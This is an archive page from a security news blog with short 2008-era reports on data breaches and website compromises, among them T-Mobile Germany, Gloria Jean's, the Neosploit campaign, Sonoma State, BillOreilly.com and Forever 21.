CyberInsecure.com

Archive for the ‘Breaches And Incidents’ Category

In 2006, 17 million German customer records were stolen from T-Mobile, a mobile network operator headquartered in Bonn, Germany. T-Mobile has admitted the incident where stolen customer records included names, addresses, phone numbers, dates of birth and email addresses.

Silent about the data loss for more than two years, the company published its version of events on Saturday following a report in German news magazine Der Spiegel that the data were being offered for sale on the Internet. When the loss of the disk was discovered, the company reported the loss to the state prosecutor, and began monitoring Internet forums and sites where such stolen information is offered for sale.

The records included secret addresses of politicians, an ex-federal president, celebrities and others likely to be at risk from having their contact details released. No bank details were included in the stolen data.

The company said a storage device containing the files “is in the hands of unknown parties”. T-Mobile’s parent, Deutsche Telekom, said it had no evidence that the records had been used since 2006. Although the records had been offered for sale online, no one had bought them. The data for sale includes the home addresses and unlisted phone numbers of many German celebrities, business leaders, billionaires, religious representatives, government ministers and politicians. German regulators are investigating the incident.

The company said it had made every effort to get the data back and has improved procedures to stop a similar theft happening again. Deutsche Telekom apologized for the loss and has set up a hotline to deal with worried customers.

Earlier this month, gloriajeans.com website was the subject of an attack that allowed an unknown person or persons to obtain the addresses and credit card numbers of 511 of the customers as they were placing orders on the site. According to New Hampshire State Attorney General, Gloria Jeans Coffee (Gloria Jean’s) recently experienced a data security breach in its e-commerce site hosted by Smith Micro, Inc.

The personal information affected may include customer names, addresses, telephone numbers, emails, and credit card information. Gloria Jean’s has not determined that any fraudulent credit card transaction has occurred as a result of this incident. Since Social Security Numbers or other financial account information is not collected, the attacker accessed only credit card numbers, names and addresses.

A full analysis of the e-commerce server files revealed on September 4th, 2008 an individual initiated modifications to checkout web pages from a shared IP address located in the United States. On September 10, 2008, the intrusion was identified and it was clear that the modifications were able to access and screen capture the personal transaction information and dump the information to an external server and log file. The encrypted database was not exposed to this intrusion.

Once discovered, Gloria Jean’s immediately took its website off line and confirmed that there was no malicious or unauthorized code included as part of its website before returning the site was returned to service. They also contacted the server host of the intruder’s log file with consumer information to have the IP address disabled and inaccessible. The incident was reported to the United States Secret Service Electronics Crimes Task Force (ECTF) and a notice was sent to affected customers by U.S. First Class mail and email.

Gloria Jean’s investigation of this incident is ongoing in cooperation with its initial report and provision of materials to a representative from the ECTF.

According to Ian Amit, director of security research at Aladdin Knowledge Systems, cybercriminals have used the latest version of Neosploit to booby-trap an estimated 80,000 legitimate sites with malicious code. Victims of the attack include government, Fortune 500, and a weapons manufacturing firm. Victims of the attack also included the US Postal Service, which has since cleaned up its act.

Amit uncovered the assault while researching the newly-released Neosploit 3.1 hacker toolkit. During his research, he discovered login credentials for more than 200,000 servers on a server used by cybercrooks. These credentials included BBC login details fortunately unconnected to the corporation’s news or content sites.

Analysis by Amit and his team at Aladdin suggest that at least three gangs were involved in collecting the list and that 80,000 of these sites had been loaded with malicious code by hackers as part of attempt to infect visiting surfers through drive-by download attacks. Organizations in 86 countries are said to be affected. Amit identified the affected organizations after examining server logs.

“Out of the 200,000 credentials, nearly 107,000 were validated by the criminal server, and of which, almost 82,000 were used to modify Web related content in order to attack the users of the associated sites,” a statement by Aladdin explains.

After closer investigation of the data gathered during the research, it came to attention that not only the criminals were able to get their hands on the government’s BBC site, ftp.bbc.co.uk. If not for the sheer luck that the credentials were not associated with any online material, this incident could have ended up infecting the BBC’s website visitors.

Additionally, reputable universities such as the University of Bradford, a travel agency (easytravelgroup.co.uk), and of course a lot of internet providers and hosting companies were affected. Aladdin is working with CERT and law enforcement agencies worldwide to inform affected organizations about the compromise to their websites.

Incidents where legitimate websites are compromised with malicious code using tactics such as SQL injection attacks have reached epidemic proportions over recent months. The compromises unearthed by Aladdin join a growing list of assaults and victims. Previous targets have included the government of the City and County of San Francisco, Microsoft acquisition target atmdt.com, BMW in Mexico, Hackney Council, and BusinessWeek.com. Tools such as the The Asprox attack toolkit have featured as part and parcel of these previous attacks.

Foothills Park & Recreation District in South Jefferson County is working with the Jefferson County Sheriff’s Office in the investigation of a theft of personal information from the district’s computer network. The information have been accessed through an illegal hacking and could contain credit card information and other personal information that could be used to commit identity theft.

If information has, in fact, been stolen, it appears to be credit card information for individuals who have registered for classes either online at www.ifoothills.org or at one of Foothills Park & Recreation District’s facilities.

Foothills Executive Director Ronald Hopp said, “It is very disturbing that despite the security measures that were in effect, a rogue hacker was still successful in obtaining this information. Additional protections are being installed, and on-line registration will not be available until these measures are implemented.”

Hopp said that they started having trouble with the Web site last week. Originally the problem seemed to be a virus, but they now believe it was a cover for someone to hack the site and steal personal information. Technical staff discovered Monday morning that the files were compromised and possibly stolen the number of people affected would be “very significant.”

The district has hired a network security consultant who will be auditing the systems and making recommendations for future security measures, and all internal systems and processes are being reviewed in an effort to eliminate the possibility of this happening again.

Individual patrons whose information may have been compromised will be notified by Foothills Park & Recreation District directly and provided with additional information. The district has created an information page on its website (www.ifoothills.org/securityalert/) for individuals who are concerned that their information may have been on the network. In addition, the district has set up a special number at (303) 409-2124 to answer specific questions not addressed on the website.

SophosLabs reports an unusual bank phishing spam campaign where particular image phish targets the Italian bank Poste Italiane. The phishing email itself (in Italian) entices users to go to the link in order to receive 250 Euros worth of “loyalty bonus”. This scheme is fairly typical and the link in the message goes to a compromised domain controlled by the phisher. Instead of the phishing hosting on this compromised domain, a HTTP redirect is used to send the user to a second domain, where the phish page resides.

Whats unusual is that the domain hosting the phishing page, fjsb.com, seems to be owned by Fort Jennings State Bank, a private, local bank serving the state of Ohio. The site’s design was a throwback to the early days of HTML and the site itself does not have a lot of features most today banks sites use. The domain WHOIS confirms the ownership of the domain:

Domain Name: FJSB.COM
Registrant:
The Fort Jennings State Bank
PO Box 186
120 N Water Street
Fort Jennings, OH 45844-0186
US

Administrative Contact:
Edelbrock, Mark
FJSB
302 DELPHOS RD
COLUMBUS GRV, OH 45830-9201
US
(419) 659-2527 fax: (419) 659-2509

Technical Contact:
Burkhart, Tim
North West Net, Inc.
PO BOX 159
FORT JENNINGS, OH 45844-0159
US
419-286-3346 fax: 419-286-5345

Record expires on 30-Mar-2013.
Record created on 29-Mar-1997.

It would seem that a bank in the US hosting a phishing site of an Italian bank. This just shows that all sites (even bank or military sites) may be compromised and be used for malicious purposes, such as a phish campaign in this case, or infect visitors with malware, in other cases. The phishing site has since been taken down and the compromised site linked directly by the phish message itself now redirects to another compromised site.

In a breach notification letter sent to the New Hampshire State Attorney General, PSS World Medical states that the company “recently became aware of an incident involving unauthorized access” to company’s career board website. The unauthorized access resulted in the exposure of personal information belonging to job applicants and others that may have posted their information on the site. No additional details were disclosed by PSS World Medical.

The event may have resulted in unauthorized access to certain personal information such as name, address, date of birth, driver’s license number and Social Security number of certain individuals who posted their information to the career board website. While personal information may have been accessed, there is no evidence that any information has been obtained or misused.

Concerned users can call toll-free at (866) 371-2502, Monday through Friday, between 9:00 AM -5:00PM Eastern. Free credit monitoring will be provided to the affected persons, although it is not clear for how long.

A breach in Sonoma State University exposed about 600 former computer science students who have had their Social Security numbers on an internal department Web server. Though acknowledging the risk of identification theft, university officials said they were not aware of any criminal or inappropriate activity linked to the slip-up, which was discovered Sept. 2.

A former student accessed the roster of names and Social Security numbers through a networking site opened about six months earlier for people previously enrolled in computer science classes, SSU spokeswoman Susan Kashak said.

The Web site was closed to anyone but certain students, and the roster, though stored on the department server, was not directly linked to the site, university officials said.

The student apparently found the data using a Web crawler to search for odds and ends, they said. “Somehow that data inadvertently got accessible from the Web page,” officials said. “There were no links to it so you would ‘Click here to a list of alums’ or anything like that.“

There were no indications anyone else saw the list or accessed the data for ulterior purposes. It was expunged as soon as the student who found it brought to officials’ attention.

The file contained only names and Social Security numbers, so no other personal, confidential information was compromised, officials said. Affected students have nonetheless been advised to check their credit reports to make sure their information is not being used.

The security breach pales compared with a 2005 episode in which hackers gained access to seven campus workstations, exposing the names and Social Security numbers of 61,709 people who had applied to, attended or graduated from SSU from 1995 to 2002, the university said. Faculty data from 1999 to 2005 also was compromised in the hacking incident, though it did not appear any of the personal information was accessed or abused.

The Social Security numbers at issue this fall were improperly stored on a department server outside the management of SSU’s central information technology system and kept against university policy. Current rules prevent anyone on campus from having computer files with Social Security numbers absent specific permission. They used to be used to identify students before student identification numbers came into use, however.

A recent assessment of SSU’s information systems called for improved oversight of the independently managed computers and servers such as that containing the compromised data.

Unknown intruders have hacked the website of conservative commentator Bill O’Reilly and posted personal details of more than 200 of its subscribers. The breach into BillOreilly.com came as retaliation for remarks O’Reilly made on FoxNews condemning the attack on Palin’s Yahoo email account, according to Wikileaks, a site that makes it easy for hackers and anyone else to leak documents. BillOreilly.com charges $4.95 for monthly premium membership. The O’Reilly Store sells hats, mugs, T-shirts and other merchandise.

As proof, Wikileaks posted a screenshot of the BillOreilly.com administrative interface that showed the names, email addresses, passwords, and home town of 20 subscribers of the website. In all, information belonging to 205 subscribers was intercepted, according to Eric Marston, CTO of Nox Solutions, the company that maintained the O’Reilly website.

The hack came in response to comments O’Reilly made on Fox News about the posting of contents of Palin’s email account, including pictures of her daughter and her contact list. The hackers were able to access the unsecured list by trying a large number of variations of the website’s administrative URL. All affected members have received an email and a phone call informing them of the breach and urging them to change their password anywhere they may have used it. No credit card information was stolen, and the site has since been completely locked down.

“I’m not going to mention the website that posted this, but it’s one of those despicable, slimy, scummy websites,” O’Reilly said, according to this snippet from YouTube. “Everybody knows where this stuff is, OK, and they know the people who run the website, so why can’t they go there tonight to the guy’s house who runs it, put him in cuffs and take him down and book him?”

It’s evident from the remark that no one bothered to tell O’Reilly that Wikileaks, the first site to publish the Palin email, is a multi-national, bulletproof organization that has successfully withstood serious take-down efforts before. While the information exposed on Wikileaks may seem minimal, it has the potential to imperil the BillOreilly.com subscribers listed in ways they may not have anticipated.

The website for the Texas National Guard remained unreachable on Friday, two days after security researchers said it had been hacked by miscreants who were using it to install malware on visitors PCs. Some pages on the website were probably SQL injected.

On Wednesday, Roger Thompson, chief research officer of anti-virus provider AVG, reported that selected pages on the site were attempting to install a rootkit on machines that were not fully patched. The ruse starts by silently redirecting visitors to a site called add-block-plus.net, which in turn bounces visitors to several other sites.

The attack comes as the Texas National Guard responds to Hurricane Ike, which earlier this week ravaged the gulf coast of Texas. Someone answering the guard’s public affairs line said the person responsible for the website was busy with relief efforts.

Not only Texas has been hammered so hard by the hurricane, the guys that are probably helping out the most have been hacked in return. Now Texas National Guard needs to find how the Bad Guys got in, and then fix the flaw, which will most likely pop on other gov related websites. According to Sophos researchers, the Texas National Guard is only one of many sites to be hit in the attack. The malware residing on the site is detected as Mal/ObfJS-A.

Payment cards used by customers of several Forever 21 Inc. retail stores may have been compromised in a series of data thefts dating back to August 2004. Forever 21, a discount retailer company based in Los Angeles, have been notified by the U.S. Department of Justice in Boston on Aug. 5. There was no explanation for why the company waited more than a month after it discovered the compromise to notify affected customers about it. Forever 21 discovered the thefts only after being notified of them by the Department of Justice, according to a statement released last week and posted on the discount retailer’s Web site.

The Department of Justice (DOJ) last month filed indictments against three people who allegedly hacked into computer systems belonging to 12 retailers to steal payment card data, including a much-publicized breach at TJX Companies. Forever 21 said it was notified by the DOJ that it was one of the victims of those attacks and was given a disk containing “potentially compromised file data.”

A subsequent forensic analysis revealed that transaction data for approximately 98,930 credit and debit card numbers had been illegally accessed, with more than 20,000 of the transactions made at the company’s Fresno store. The company’s investigations indicated that the intrusions affected customers who shopped at the company’s stores on nine specific dates. The first intrusion dated back to March 25, 2004, the most recent one occurred Aug. 14, 2007.

The compromised data included credit and debit cards, expiration dates “and other card data,” but did not include customer names or addresses. More than half of the compromised payment cards are either inactive or have expired, the company said. The company offered no details on what other data might have been compromised, and it was not clear whether all nine of the data theft incidents resulted from a single intrusion or whether the company’s systems were broken into nine separate times.

Forever 21 stressed that it has complied with the requirements of the credit card industry’s Payment Card Industry Data Security Standards (PCI DSS) since they went into effect. And it noted it has been certified as being PCI-compliant since 2007. It was not immediately clear whether that compliance was achieved before or after August 2007, when four of the illegal data access incidents took place.

The incidents cited by Forever 21 appear linked to the early August arrests of 11 people on credit card fraud-related charges. They are believed responsible for a series of data heists at 12 major retailers, including TJX Companies Inc., Forever 21, BJ Wholesale Clubs Inc, DSW Inc. Office Max Inc., Barnes and Noble and Sports Authority.